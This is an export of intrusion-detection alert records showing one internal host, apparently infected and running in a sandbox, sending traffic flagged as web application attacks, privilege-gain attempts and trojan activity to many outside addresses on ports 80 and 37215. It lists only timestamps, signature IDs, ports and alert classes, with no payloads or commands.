      Timestamp:192.168.2.23223.6.157.951858802030092 01/26/24-15:32:36.362831
      SID:2030092
      Source Port:51858
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.77.27.11560260802030092 01/26/24-15:31:54.025906
      SID:2030092
      Source Port:60260
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.47.167.10943070802025883 01/26/24-15:31:58.381828
      SID:2025883
      Source Port:43070
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23162.0.233.13637134802025883 01/26/24-15:32:23.725294
      SID:2025883
      Source Port:37134
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23210.71.232.17739778802030092 01/26/24-15:31:21.012973
      SID:2030092
      Source Port:39778
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23147.154.142.11933900802025883 01/26/24-15:32:58.863656
      SID:2025883
      Source Port:33900
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23165.95.154.15844052802025883 01/26/24-15:31:18.585023
      SID:2025883
      Source Port:44052
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23196.51.15.16032854802025883 01/26/24-15:32:47.842051
      SID:2025883
      Source Port:32854
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2352.142.126.8859246802030092 01/26/24-15:31:04.732287
      SID:2030092
      Source Port:59246
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.65.32.13337420802030092 01/26/24-15:31:22.785357
      SID:2030092
      Source Port:37420
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2343.248.169.5059858802030092 01/26/24-15:31:50.006489
      SID:2030092
      Source Port:59858
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.16.140.12633278802030092 01/26/24-15:32:18.575264
      SID:2030092
      Source Port:33278
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.85.131.24559562802025883 01/26/24-15:31:47.589436
      SID:2025883
      Source Port:59562
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.14.3.12152026802030092 01/26/24-15:32:49.343724
      SID:2030092
      Source Port:52026
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23107.142.58.6338674802025883 01/26/24-15:32:30.553653
      SID:2025883
      Source Port:38674
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23120.78.196.16559336802025883 01/26/24-15:31:13.062668
      SID:2025883
      Source Port:59336
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23154.80.190.13136832802030092 01/26/24-15:31:12.938827
      SID:2030092
      Source Port:36832
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.77.215.3955030802025883 01/26/24-15:31:35.402143
      SID:2025883
      Source Port:55030
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23184.50.79.2339916802025883 01/26/24-15:31:20.743260
      SID:2025883
      Source Port:39916
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.33.79.19236726802025883 01/26/24-15:31:33.398550
      SID:2025883
      Source Port:36726
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23124.198.30.11542388802025883 01/26/24-15:32:09.698068
      SID:2025883
      Source Port:42388
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23123.56.30.12146802802030092 01/26/24-15:31:52.000684
      SID:2030092
      Source Port:46802
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.71.5842036372152835222 01/26/24-15:32:57.468846
      SID:2835222
      Source Port:42036
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2338.53.62.16238764802030092 01/26/24-15:32:58.590976
      SID:2030092
      Source Port:38764
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.45.114.19360734802025883 01/26/24-15:32:44.623354
      SID:2025883
      Source Port:60734
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23212.36.196.939926802030092 01/26/24-15:31:01.231763
      SID:2030092
      Source Port:39926
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23116.202.54.2452170802025883 01/26/24-15:33:01.962315
      SID:2025883
      Source Port:52170
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2354.165.187.10039016802030092 01/26/24-15:33:01.778861
      SID:2030092
      Source Port:39016
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.38.124.18233456802025883 01/26/24-15:32:19.617457
      SID:2025883
      Source Port:33456
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2386.22.49.25350780802030092 01/26/24-15:32:21.592093
      SID:2030092
      Source Port:50780
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.238.209.240.1343058802025883 01/26/24-15:31:18.206989
      SID:2025883
      Source Port:43058
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2393.213.121.25459160802030092 01/26/24-15:31:04.539128
      SID:2030092
      Source Port:59160
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23172.103.183.22433132802025883 01/26/24-15:31:41.395483
      SID:2025883
      Source Port:33132
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2354.195.88.16833964802030092 01/26/24-15:31:27.050988
      SID:2030092
      Source Port:33964
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23134.65.235.16534716802030092 01/26/24-15:32:23.607670
      SID:2030092
      Source Port:34716
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23193.178.43.2245548802030092 01/26/24-15:32:42.820275
      SID:2030092
      Source Port:45548
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.63.87.4949220802025883 01/26/24-15:33:01.955923
      SID:2025883
      Source Port:49220
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.22.63.14333402802030092 01/26/24-15:31:55.603784
      SID:2030092
      Source Port:33402
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2345.183.19.21936238802025883 01/26/24-15:32:15.022014
      SID:2025883
      Source Port:36238
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.225.26.17856352802030092 01/26/24-15:31:49.538944
      SID:2030092
      Source Port:56352
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.149.45.23655346802030092 01/26/24-15:31:47.560632
      SID:2030092
      Source Port:55346
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23159.69.144.11053778802030092 01/26/24-15:32:48.799773
      SID:2030092
      Source Port:53778
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2351.132.35.11638754802030092 01/26/24-15:31:44.773755
      SID:2030092
      Source Port:38754
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2341.47.185.5860580372152835222 01/26/24-15:31:53.094755
      SID:2835222
      Source Port:60580
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23190.175.16.10033660802030092 01/26/24-15:32:42.003037
      SID:2030092
      Source Port:33660
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2379.132.142.4560932802025883 01/26/24-15:31:04.250547
      SID:2025883
      Source Port:60932
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.241.15.8642302372152835222 01/26/24-15:33:01.150691
      SID:2835222
      Source Port:42302
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2318.165.59.19938728802030092 01/26/24-15:32:01.702335
      SID:2030092
      Source Port:38728
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2344.211.68.17335700802025883 01/26/24-15:31:43.857382
      SID:2025883
      Source Port:35700
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2334.49.218.22734324802030092 01/26/24-15:31:51.202892
      SID:2030092
      Source Port:34324
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23199.119.73.2160650802025883 01/26/24-15:32:21.518956
      SID:2025883
      Source Port:60650
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23190.166.87.16747940802030092 01/26/24-15:31:12.177184
      SID:2030092
      Source Port:47940
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23107.172.253.17556648802030092 01/26/24-15:31:26.762471
      SID:2030092
      Source Port:56648
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.93.247.23160758802025883 01/26/24-15:31:27.233231
      SID:2025883
      Source Port:60758
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2369.58.6.20547720802025883 01/26/24-15:32:46.232134
      SID:2025883
      Source Port:47720
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.177.201.847482802030092 01/26/24-15:32:30.581668
      SID:2030092
      Source Port:47482
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23121.144.178.3158814802025883 01/26/24-15:31:12.317058
      SID:2025883
      Source Port:58814
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23167.82.74.11251752802025883 01/26/24-15:32:04.521738
      SID:2025883
      Source Port:51752
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2354.86.197.21752968802025883 01/26/24-15:32:32.488871
      SID:2025883
      Source Port:52968
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.173.86.11947328802030092 01/26/24-15:31:51.388493
      SID:2030092
      Source Port:47328
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.169.65.16252674802025883 01/26/24-15:31:58.502198
      SID:2025883
      Source Port:52674
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.238.9.3533144802025883 01/26/24-15:31:17.425409
      SID:2025883
      Source Port:33144
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.66.134.20444984802025883 01/26/24-15:31:55.571417
      SID:2025883
      Source Port:44984
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2347.107.144.24648474802030092 01/26/24-15:31:30.798057
      SID:2030092
      Source Port:48474
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2347.99.247.17737488802030092 01/26/24-15:32:45.240841
      SID:2030092
      Source Port:37488
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2387.99.180.17049486802030092 01/26/24-15:32:47.668429
      SID:2030092
      Source Port:49486
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.79.111.1960996802025883 01/26/24-15:32:33.990530
      SID:2025883
      Source Port:60996
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2314.199.230.22159086802025883 01/26/24-15:31:36.005046
      SID:2025883
      Source Port:59086
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.241.13.3739998372152829579 01/26/24-15:32:46.480373
      SID:2829579
      Source Port:39998
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2338.165.105.3057168802025883 01/26/24-15:32:38.806869
      SID:2025883
      Source Port:57168
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23204.54.40.18351026802030092 01/26/24-15:32:37.342241
      SID:2030092
      Source Port:51026
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2362.29.79.232852802030092 01/26/24-15:31:55.883506
      SID:2030092
      Source Port:32852
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23223.252.6.2145092802030092 01/26/24-15:32:37.032412
      SID:2030092
      Source Port:45092
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23103.69.193.7345732802025883 01/26/24-15:32:29.071266
      SID:2025883
      Source Port:45732
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.65.143.7146658802030092 01/26/24-15:31:58.566964
      SID:2030092
      Source Port:46658
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.169.210.7344226802030092 01/26/24-15:32:56.420174
      SID:2030092
      Source Port:44226
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23208.69.96.8050392802025883 01/26/24-15:31:23.456047
      SID:2025883
      Source Port:50392
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23197.234.61.13656368372152835222 01/26/24-15:32:26.903685
      SID:2835222
      Source Port:56368
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2318.165.105.16133670802030092 01/26/24-15:32:01.343654
      SID:2030092
      Source Port:33670
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.213.160.22451902802025883 01/26/24-15:32:57.098575
      SID:2025883
      Source Port:51902
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2399.83.214.2360542802025883 01/26/24-15:31:41.398087
      SID:2025883
      Source Port:60542
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.119.82.8756146802030092 01/26/24-15:31:16.948086
      SID:2030092
      Source Port:56146
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2388.221.24.1056354802025883 01/26/24-15:31:20.588355
      SID:2025883
      Source Port:56354
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.10.129.13339718802030092 01/26/24-15:32:33.568575
      SID:2030092
      Source Port:39718
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.118.223.18155768802025883 01/26/24-15:31:35.676752
      SID:2025883
      Source Port:55768
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23198.143.148.255194802025883 01/26/24-15:31:41.508143
      SID:2025883
      Source Port:55194
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23107.22.76.4153952802030092 01/26/24-15:32:12.670692
      SID:2030092
      Source Port:53952
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23164.92.241.13355232802025883 01/26/24-15:32:09.847930
      SID:2025883
      Source Port:55232
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2376.164.156.1132940802030092 01/26/24-15:31:01.082396
      SID:2030092
      Source Port:32940
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2347.246.10.10051578802025883 01/26/24-15:32:18.896072
      SID:2025883
      Source Port:51578
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.80.232.839126802030092 01/26/24-15:31:55.941031
      SID:2030092
      Source Port:39126
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23162.14.120.4537518802030092 01/26/24-15:31:49.711223
      SID:2030092
      Source Port:37518
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23155.138.11.2035510802030092 01/26/24-15:32:32.511749
      SID:2030092
      Source Port:35510
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.250.15.7359280802025883 01/26/24-15:31:19.040568
      SID:2025883
      Source Port:59280
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2379.120.228.19036614802025883 01/26/24-15:31:55.590446
      SID:2025883
      Source Port:36614
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.13.20.12338938802030092 01/26/24-15:31:26.930377
      SID:2030092
      Source Port:38938
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23185.114.96.7050582802025883 01/26/24-15:31:22.833185
      SID:2025883
      Source Port:50582
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23138.38.41.21651486802030092 01/26/24-15:31:58.449347
      SID:2030092
      Source Port:51486
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23116.203.0.3550408802030092 01/26/24-15:32:01.763592
      SID:2030092
      Source Port:50408
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.145.232.19832932802025883 01/26/24-15:31:18.095689
      SID:2025883
      Source Port:32932
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2399.84.164.15758968802025883 01/26/24-15:31:52.668950
      SID:2025883
      Source Port:58968
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23154.177.20.19240328802025883 01/26/24-15:31:30.679568
      SID:2025883
      Source Port:40328
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2352.7.93.3850156802030092 01/26/24-15:31:55.485744
      SID:2030092
      Source Port:50156
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2373.223.88.24932972802025883 01/26/24-15:31:16.960028
      SID:2025883
      Source Port:32972
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2367.225.246.16446820802030092 01/26/24-15:32:30.553241
      SID:2030092
      Source Port:46820
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2364.68.224.6848616802025883 01/26/24-15:31:55.514444
      SID:2025883
      Source Port:48616
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.38.65.23037578802025883 01/26/24-15:33:00.622420
      SID:2025883
      Source Port:37578
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.194.29.14435718802030092 01/26/24-15:31:17.004706
      SID:2030092
      Source Port:35718
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23149.202.117.7637802802025883 01/26/24-15:31:12.472984
      SID:2025883
      Source Port:37802
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2314.245.88.10533686802025883 01/26/24-15:32:34.039201
      SID:2025883
      Source Port:33686
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23134.73.222.13851042802025883 01/26/24-15:31:58.715162
      SID:2025883
      Source Port:51042
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23149.62.39.12557276802030092 01/26/24-15:32:32.482019
      SID:2030092
      Source Port:57276
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23159.192.157.644384802030092 01/26/24-15:32:36.360354
      SID:2030092
      Source Port:44384
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23142.252.201.24755670802025883 01/26/24-15:31:18.623898
      SID:2025883
      Source Port:55670
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2350.98.58.3954190802030092 01/26/24-15:31:53.687421
      SID:2030092
      Source Port:54190
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2364.9.223.3838386802025883 01/26/24-15:33:02.010793
      SID:2025883
      Source Port:38386
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2396.11.176.8641084802030092 01/26/24-15:32:11.726295
      SID:2030092
      Source Port:41084
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2320.31.197.739198802025883 01/26/24-15:31:27.808194
      SID:2025883
      Source Port:39198
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23178.242.124.21358878802025883 01/26/24-15:31:58.866499
      SID:2025883
      Source Port:58878
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2385.192.198.14541010802025883 01/26/24-15:32:11.645204
      SID:2025883
      Source Port:41010
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23136.243.128.17336892802025883 01/26/24-15:32:04.624562
      SID:2025883
      Source Port:36892
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.232.187.2.18036322802025883 01/26/24-15:32:19.863183
      SID:2025883
      Source Port:36322
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23119.45.129.20653114802025883 01/26/24-15:32:25.279467
      SID:2025883
      Source Port:53114
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23222.109.127.9046800802025883 01/26/24-15:32:01.846679
      SID:2025883
      Source Port:46800
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23147.46.47.20155390802025883 01/26/24-15:31:44.866076
      SID:2025883
      Source Port:55390
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.254.80.7051952372152829579 01/26/24-15:31:47.724803
      SID:2829579
      Source Port:51952
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23121.194.9.19857954802025883 01/26/24-15:31:51.436086
      SID:2025883
      Source Port:57954
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23190.188.119.23743640802030092 01/26/24-15:31:32.992616
      SID:2030092
      Source Port:43640
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23117.180.233.2255668802030092 01/26/24-15:32:25.279506
      SID:2030092
      Source Port:55668
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23159.135.59.13646244802030092 01/26/24-15:32:42.602169
      SID:2030092
      Source Port:46244
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.252.184.9634812802025883 01/26/24-15:32:20.331624
      SID:2025883
      Source Port:34812
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23163.5.153.17637304802030092 01/26/24-15:31:15.922580
      SID:2030092
      Source Port:37304
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.244.93.14353116802030092 01/26/24-15:31:43.590528
      SID:2030092
      Source Port:53116
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.197.204.14558404802030092 01/26/24-15:31:44.628404
      SID:2030092
      Source Port:58404
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.202.233.18551830802030092 01/26/24-15:31:23.700788
      SID:2030092
      Source Port:51830
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23168.188.96.23332882802030092 01/26/24-15:32:06.737937
      SID:2030092
      Source Port:32882
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.126.135.9653502802030092 01/26/24-15:31:47.579147
      SID:2030092
      Source Port:53502
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.74.9.15052340802025883 01/26/24-15:32:01.875204
      SID:2025883
      Source Port:52340
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2395.217.64.1435260802030092 01/26/24-15:31:44.835063
      SID:2030092
      Source Port:35260
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2347.4.208.4636724802030092 01/26/24-15:31:58.730412
      SID:2030092
      Source Port:36724
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23223.119.221.2845996802025883 01/26/24-15:32:43.176340
      SID:2025883
      Source Port:45996
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.224.13.5541862372152835222 01/26/24-15:33:01.135581
      SID:2835222
      Source Port:41862
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23154.213.118.5740188802030092 01/26/24-15:31:48.000339
      SID:2030092
      Source Port:40188
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.3.88.6154542802025883 01/26/24-15:32:11.576925
      SID:2025883
      Source Port:54542
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23188.210.221.15439790802030092 01/26/24-15:32:23.860113
      SID:2030092
      Source Port:39790
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23186.132.69.4933608802030092 01/26/24-15:32:01.710929
      SID:2030092
      Source Port:33608
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23216.197.110.5841542802030092 01/26/24-15:32:11.802137
      SID:2030092
      Source Port:41542
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.66.93.4053630802030092 01/26/24-15:31:22.834753
      SID:2030092
      Source Port:53630
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.86.0.8042292802025883 01/26/24-15:31:35.809763
      SID:2025883
      Source Port:42292
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.60.235.16253328802030092 01/26/24-15:32:58.656896
      SID:2030092
      Source Port:53328
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.236.253.17456960802025883 01/26/24-15:32:32.634718
      SID:2025883
      Source Port:56960
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.35.2.18651384802025883 01/26/24-15:31:30.804139
      SID:2025883
      Source Port:51384
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23103.161.34.8042092802025883 01/26/24-15:32:23.795964
      SID:2025883
      Source Port:42092
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.202.252.17459934802025883 01/26/24-15:32:30.867097
      SID:2025883
      Source Port:59934
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.87.193.15950068802025883 01/26/24-15:32:39.122866
      SID:2025883
      Source Port:50068
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23216.152.233.16838206802025883 01/26/24-15:31:23.737000
      SID:2025883
      Source Port:38206
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
